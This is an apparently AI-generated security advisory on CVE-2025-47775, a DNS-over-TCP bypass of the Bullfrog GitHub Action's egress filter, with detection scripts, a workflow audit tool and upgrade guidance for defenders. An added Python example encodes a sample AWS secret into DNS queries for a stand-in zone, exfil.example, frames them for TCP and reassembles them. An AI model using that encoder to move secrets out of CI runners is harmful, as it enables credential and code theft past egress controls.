CVE-2025-47775 Overview
CVE-2025-47775 affects Bullfrog, a GitHub Action that blocks unauthorized outbound traffic from GitHub Actions workflows. An attacker with code execution inside a protected workflow can bypass the egress sandbox by sending DNS queries over TCP instead of UDP and use them to exfiltrate data from the runner. Versions prior to 0.8.4 do not filter TCP-based DNS traffic, so the intended blocking behavior does not hold. The maintainers released v0.8.4 to address the issue.
The vulnerability is classified as CWE-201 (Insertion of Sensitive Information Into Sent Data) and is documented in GitHub Security Advisory GHSA-m32f-fjw2-37v3.
Critical Impact
Attackers can bypass Bullfrog's egress filtering and exfiltrate secrets, source code, or build artifacts from GitHub Actions workflows using TCP-based DNS tunneling.
Affected Products
- Bullfrogsec Bullfrog GitHub Action prior to version 0.8.4
- GitHub workflows relying on Bullfrog for outbound traffic restriction
- CI/CD pipelines using Bullfrog as a sandboxing control
Discovery Timeline
- 2025-05-14 - CVE-2025-47775 published to NVD
- 2025-07-11 - Last updated in NVD database
Technical Details for CVE-2025-47775
Vulnerability Analysis
Bullfrog operates as a GitHub Action that enforces egress filtering on workflow runners by intercepting and inspecting outbound network traffic. The action is intended to prevent unauthorized data exfiltration and command-and-control communication from compromised builds.
The vulnerability stems from incomplete protocol coverage in the filtering logic. Bullfrog applies its blocking rules to DNS over UDP, the default transport, but not to DNS over TCP. TCP is a standard DNS transport (RFC 1035 requires it for truncated responses and zone transfers), so every resolver accepts such queries and ordinary tooling can send them, for example dig +tcp. An attacker who gains code execution inside a workflow can therefore issue DNS queries over TCP to an attacker-controlled name server, bypassing the sandbox and exfiltrating data.
This class of bypass undermines the core security guarantee of the tool. Workflows that depend on Bullfrog to contain malicious dependencies or compromised actions remain exposed to DNS tunneling techniques until upgraded.
Root Cause
The root cause is a missing enforcement path for TCP DNS traffic in the egress filtering implementation. The filtering rules covered UDP DNS but did not extend equivalent controls to TCP port 53, leaving an unmonitored channel for outbound queries.
Attack Vector
Exploitation requires the attacker to execute code within a Bullfrog-protected workflow, typically through a malicious dependency, compromised action, or untrusted pull request. Once executing, the attacker issues DNS queries over TCP to an attacker-controlled authoritative server. Sensitive data is encoded into subdomain labels and transmitted as part of DNS lookups, evading the egress block.
No authentication or user interaction with the GitHub workflow is required beyond triggering the vulnerable build. See the patch commit for the corrective changes.
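The attack vector above, as an added worked example that is not part of the advisory or of the Bullfrog project: it shows how bytes are packed into DNS labels and how a query is framed for TCP transport (RFC 1035 section 4.2.2, a two-byte length prefix that a UDP-only filter never sees), then parses the stream back the way the attacker's authoritative server would. The zone exfil.example, the secret and all function names are assumptions for the demonstration; nothing is sent over the network.

```python
# Added example (not Bullfrog's code, not from the advisory): encoding and
# TCP framing of DNS queries used for exfiltration, plus the server-side
# reassembly. The zone exfil.example is hypothetical; nothing is sent.
import base64
import struct

ZONE = "exfil.example"   # hypothetical attacker-controlled zone
MAX_LABEL = 63           # RFC 1035 limit per label
MAX_NAME = 253           # RFC 1035 limit for the whole name
QTYPE_TXT, QCLASS_IN = 16, 1


def chunks_to_labels(data: bytes) -> list[str]:
    """base32 is case-insensitive and uses only [a-z2-7], so any resolver carries it."""
    enc = base64.b32encode(data).decode().rstrip("=").lower()
    return [enc[i:i + MAX_LABEL] for i in range(0, len(enc), MAX_LABEL)]


def labels_to_bytes(labels: list[str]) -> bytes:
    enc = "".join(labels).upper()
    return base64.b32decode(enc + "=" * (-len(enc) % 8))   # restore padding


def exfil_names(secret: bytes, zone: str = ZONE, per_query: int = 3) -> list[str]:
    """Split the secret across several names; label s<n> carries the sequence number."""
    labels = chunks_to_labels(secret)
    names = []
    for n, i in enumerate(range(0, len(labels), per_query)):
        name = ".".join([f"s{n}"] + labels[i:i + per_query] + [zone])
        assert len(name) <= MAX_NAME
        names.append(name)
    return names


def build_query(qname: str, txid: int) -> bytes:
    """Minimal DNS query: header with RD=1, QDCOUNT=1, one TXT question."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    question = b"".join(bytes([len(l)]) + l.encode() for l in qname.split("."))
    return header + question + b"\x00" + struct.pack("!HH", QTYPE_TXT, QCLASS_IN)


def frame_tcp(msg: bytes) -> bytes:
    """Over TCP each DNS message is prefixed with a two-byte big-endian length."""
    return struct.pack("!H", len(msg)) + msg


def parse_tcp_frames(stream: bytes) -> list[bytes]:
    """Server side: split the TCP byte stream back into individual messages."""
    msgs, off = [], 0
    while off + 2 <= len(stream):
        (n,) = struct.unpack("!H", stream[off:off + 2])
        msgs.append(stream[off + 2:off + 2 + n])
        off += 2 + n
    return msgs


def qname_from_query(msg: bytes) -> str:
    off, labels = 12, []           # skip the 12-byte header
    while msg[off]:
        n = msg[off]
        labels.append(msg[off + 1:off + 1 + n].decode())
        off += 1 + n
    return ".".join(labels)


def recover_secret(names: list[str], zone: str = ZONE) -> bytes:
    parts = {}
    for name in names:
        if not name.endswith("." + zone):
            continue
        seq, *labels = name[:-len(zone) - 1].split(".")
        parts[int(seq[1:])] = labels
    return labels_to_bytes([l for k in sorted(parts) for l in parts[k]])


# Constructed secret for the demo, not a real credential.
SECRET = b"AWS_SECRET_ACCESS_KEY=" + b"x" * 150


def demo(secret: bytes = SECRET):
    names = exfil_names(secret)
    stream = b"".join(frame_tcp(build_query(n, txid=i)) for i, n in enumerate(names))
    recovered = recover_secret([qname_from_query(m) for m in parse_tcp_frames(stream)])
    return names, stream, recovered


if __name__ == "__main__":
    names, stream, recovered = demo()
    print(len(names), "queries,", len(stream), "bytes on the wire, round trip ok:", recovered == SECRET)
```

The only difference between this and a UDP query is frame_tcp: the DNS payload is byte-identical. An egress control that matches on UDP/53 but has no rule for TCP/53 therefore lets the same payload through unchanged, which is why the fix had to cover the transport, not the query contents.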
Detection Methods for CVE-2025-47775
Indicators of Compromise
- Outbound TCP connections to port 53 originating from GitHub Actions runners
- High-volume or unusually long DNS queries with encoded subdomain labels
- DNS lookups targeting domains not present in the workflow's expected allowlist
- Bullfrog action versions earlier than 0.8.4 referenced in workflow YAML files
Detection Strategies
- Audit repository workflow definitions for bullfrogsec/bullfrog pinned to versions below 0.8.4
- Inspect runner egress logs for TCP/53 traffic; legitimate TCP fallback happens only for truncated (TC=1) responses and zone transfers, so it should be rare in CI workloads and every occurrence is worth attributing to a specific step
- Correlate DNS query patterns against known tunneling signatures such as long base32 or base64 labels
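The workflow audit in the first strategy above, as an added stdlib-only script that is not part of the advisory or the Bullfrog project. It scans workflow text for bullfrogsec/bullfrog references and compares the tag numerically against 0.8.4 (a string comparison would wrongly rank v0.8.10 below v0.8.4). The sample workflow, its line layout and the 40-hex SHA in it are constructed for the demonstration.

```python
# Added example, not part of the advisory or the Bullfrog project: audit
# workflow files for bullfrogsec/bullfrog references below v0.8.4.
# The sample workflow and the SHA it contains are constructed.
import glob
import os
import re

PATCHED = (0, 8, 4)
USES_RE = re.compile(r"^\s*(?:-\s*)?uses:\s*['\"]?bullfrogsec/bullfrog@([^\s'\"#]+)", re.I)
SEMVER_RE = re.compile(r"^v?(\d+)\.(\d+)\.(\d+)$")
SHA_RE = re.compile(r"^[0-9a-f]{40}$", re.I)


def classify_ref(ref: str) -> str:
    m = SEMVER_RE.match(ref)
    if m:
        return "vulnerable" if tuple(map(int, m.groups())) < PATCHED else "patched"
    if SHA_RE.match(ref):
        # Right shape for a pin, but the trailing "# vX.Y.Z" comment is not
        # proof: resolve the SHA against the v0.8.4 release before trusting it.
        return "sha-pin"
    # Branch names and floating tags (main, v0) resolve to whatever is
    # current and cannot be judged from the file alone.
    return "floating"


def audit(workflow_text: str):
    """Return (line number, ref, verdict) for every Bullfrog step in the text."""
    findings = []
    for lineno, line in enumerate(workflow_text.splitlines(), 1):
        m = USES_RE.match(line)
        if m:
            findings.append((lineno, m.group(1), classify_ref(m.group(1))))
    return findings


def audit_repo(root: str = "."):
    """Run audit() over every workflow file under <root>/.github/workflows."""
    out = []
    for path in sorted(glob.glob(os.path.join(root, ".github", "workflows", "*.y*ml"))):
        with open(path, encoding="utf-8") as fh:
            out += [(path, *f) for f in audit(fh.read())]
    return out


SAMPLE_WORKFLOW = """\
name: build
on: [pull_request]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: egress sandbox
        uses: bullfrogsec/bullfrog@v0.8.2
      - uses: bullfrogsec/bullfrog@v0.8.4
      - uses: bullfrogsec/bullfrog@0123456789abcdef0123456789abcdef01234567 # v0.8.4
      - uses: bullfrogsec/bullfrog@main
"""

if __name__ == "__main__":
    for lineno, ref, verdict in audit(SAMPLE_WORKFLOW):
        print(f"line {lineno}: bullfrogsec/bullfrog@{ref} -> {verdict}")
```

Treat "sha-pin" and "floating" as work items rather than passes: a SHA has to be resolved against the v0.8.4 release on GitHub, and a floating ref should be replaced by a fixed one so the audit result stays meaningful.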
Monitoring Recommendations
- Enable network flow logging on self-hosted runners to capture protocol and destination metadata
- Forward DNS resolver logs to a centralized analytics platform for anomaly detection
- Set alerts on outbound connections from CI/CD infrastructure to non-allowlisted resolvers
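The indicators and detection strategies listed above, as an added example that is not part of the advisory or the Bullfrog project: three checks (TCP to port 53, queries outside the allowlist, labels that look like base32/base64 payloads) run over constructed log lines. The key=value record layout, the allowlist, the domains and the RFC 5737 test-range IPs are assumptions for the demonstration and are not Bullfrog's output format.

```python
# Added example, not part of the advisory or the Bullfrog project: the
# detection rules above, run over constructed log lines. Record layout,
# domains and IPs are hypothetical.
import math
import re
from collections import Counter

ALLOWLIST = {"github.com", "pypi.org", "files.pythonhosted.org"}
ENCODED = re.compile(r"^[A-Za-z0-9+/=_-]{30,}$")   # base32/base64-shaped label
ENTROPY_MIN = 3.0   # bits per character; heuristic, tune on real traffic

# Constructed flow records: timestamp proto=.. dst=ip:port bytes=..
FLOW_LOG = """\
2025-05-14T10:00:01Z proto=udp dst=10.0.0.2:53 bytes=74
2025-05-14T10:00:02Z proto=tcp dst=198.51.100.20:443 bytes=5120
2025-05-14T10:00:03Z proto=tcp dst=198.51.100.7:53 bytes=640
2025-05-14T10:00:04Z proto=tcp dst=198.51.100.7:53 bytes=612
""".splitlines()

# Constructed resolver log: timestamp proto=.. qtype=.. qname=..
DNS_LOG = """\
2025-05-14T10:00:01Z proto=udp qtype=A qname=api.github.com
2025-05-14T10:00:03Z proto=tcp qtype=TXT qname=s0.mfrgg43uebrwk43fmi2tenjuhbrgimfrgg43uebrwk43fmi2tenjuhbrgi.exfil.example
2025-05-14T10:00:04Z proto=tcp qtype=TXT qname=s1.ebrwk43fmi2tenjuhbrgimfrgg43uebrwk43fmi2tenjuhbrgimfrgg43u.exfil.example
2025-05-14T10:00:05Z proto=udp qtype=A qname=updates.example.net
""".splitlines()


def parse(line: str) -> dict:
    """Split 'ts k=v k=v ...' into a dict; first token is the timestamp."""
    ts, *kv = line.split()
    rec = {"ts": ts}
    for item in kv:
        k, _, v = item.partition("=")
        rec[k] = v
    return rec


def entropy(s: str) -> float:
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def in_allowlist(qname: str, allowlist=ALLOWLIST) -> bool:
    return any(qname == d or qname.endswith("." + d) for d in allowlist)


def encoded_labels(qname: str) -> list[str]:
    """Labels that are long, drawn from an encoding alphabet and high-entropy."""
    return [l for l in qname.split(".") if ENCODED.match(l) and entropy(l) >= ENTROPY_MIN]


def analyze(flow_lines, dns_lines, allowlist=ALLOWLIST):
    """Return (timestamp, rule, detail) findings for the three rules."""
    findings = []
    for rec in map(parse, flow_lines):
        host, _, port = rec.get("dst", "").rpartition(":")
        if rec.get("proto") == "tcp" and port == "53":
            findings.append((rec["ts"], "tcp-dns", host))
    for rec in map(parse, dns_lines):
        q = rec.get("qname", "")
        if not in_allowlist(q, allowlist):
            findings.append((rec["ts"], "non-allowlisted", q))
        labs = encoded_labels(q)
        if labs:
            findings.append((rec["ts"], "encoded-label", labs[0][:16] + "..."))
    return findings


if __name__ == "__main__":
    for ts, rule, detail in analyze(FLOW_LOG, DNS_LOG):
        print(ts, rule, detail)
```

The tcp-dns rule is the one that maps directly onto this CVE; the other two also catch tunnelling over UDP and are what you would keep after upgrading. Expect the encoded-label heuristic to need tuning: long CDN hostnames and hash-based service names can cross the entropy threshold, so confirm hits against the allowlist rule and the byte volume per destination rather than alerting on it alone.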
How to Mitigate CVE-2025-47775
Immediate Actions Required
- Upgrade the Bullfrog GitHub Action to version 0.8.4 or later in all workflow files
- Rotate any secrets accessible to workflows that ran untrusted code (third-party actions, dependencies, external pull requests) under affected Bullfrog versions
- Review recent workflow runs for evidence of unexpected TCP/53 outbound traffic
Patch Information
The issue is fixed in Bullfrog v0.8.4. The corrective changes are tracked in the GitHub commit ae7744a and released through GitHub Release v0.8.4. Pin workflows to the patched version or later to restore egress enforcement.
Workarounds
- Block outbound TCP port 53 at the network or runner firewall level for CI/CD environments
- Restrict workflows to a minimal DNS allowlist enforced outside the Bullfrog action
- Use self-hosted runners with strict egress controls until upgrades are completed
# Configuration example: update the Bullfrog reference in .github/workflows/*.yml
# (step entry inside the job's steps list; for stronger pinning, reference the
# full commit SHA of the v0.8.4 release tag instead of the tag name)
      - name: Enable egress filtering
        uses: bullfrogsec/bullfrog@v0.8.4
        with:
          egress-policy: block
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.


